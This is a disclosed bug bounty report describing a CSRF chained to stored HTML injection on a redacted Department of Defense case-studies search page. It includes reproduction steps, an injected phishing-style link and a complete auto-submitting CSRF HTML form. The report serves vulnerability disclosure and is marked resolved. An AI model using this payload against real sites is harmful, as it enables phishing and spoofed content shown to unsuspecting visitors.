CSRF to Stored HTML injection at https://www.█████

Disclosed: 2020-12-03 21:31:12 By nagli To deptofdefense
Severity: Medium
Vulnerability Details
**Description:** I have found that on the https://www.███████ domain, you initiate a POST request in order to look up case studies. The `keyword` parameter of that request allows the use of bad characters such as `<`, `"` and `'`. Although XSS payloads are pretty well blocked, HTML injection is an option. As you might notice, because this is a POST request and the content is not initiated by the URL, I need to chain it with CSRF so the victim is presented with the malicious infected page, which you will see in the video PoC; even upon refreshing it remains infected with the injection, and only when you open a new tab does the page reset. This allows me to implement malicious links and content inside the case studies search page.

████████

## Step-by-step Reproduction Instructions

1. Navigate to https://www.█████
2. Craft a malicious HTML injection as you wish. I have injected: `<a href=https://naglinagli.github.io>Click here to win 1000$!</a>`
3. Save the POST request and craft a CSRF payload.

## HTML snippet of the CSRF payload:

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.███████" method="POST">
      <input type="hidden" name="keyword" value="&lt;a&#32;href&#61;https&#58;&#47;&#47;naglinagli&#46;github&#46;io&gt;Click&#32;here&#32;to&#32;win&#32;1000&#36;&#33;&lt;&#47;a&gt;" />
      <input type="hidden" name="Find&#32;Case&#32;Studies" value="Find&#32;Case&#32;Studies" />
      <input type="hidden" name="crimetype" value="none" />
      <input type="hidden" name="year" value="none" />
      <input type="hidden" name="gender" value="search&#46;php" />
      <input type="hidden" name="employeetype" value="none" />
      <input type="hidden" name="age" value="none" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

## Suggested Mitigation/Remediation Actions

Sanitizing malicious characters on the keyword parameter.
Best Regards,
nagli

## Impact

CSRF to Stored HTML injection on the case-studies search page.
Report Stats
  • Report ID: 1014593
  • State: Closed
  • Substate: resolved
  • Upvotes: 13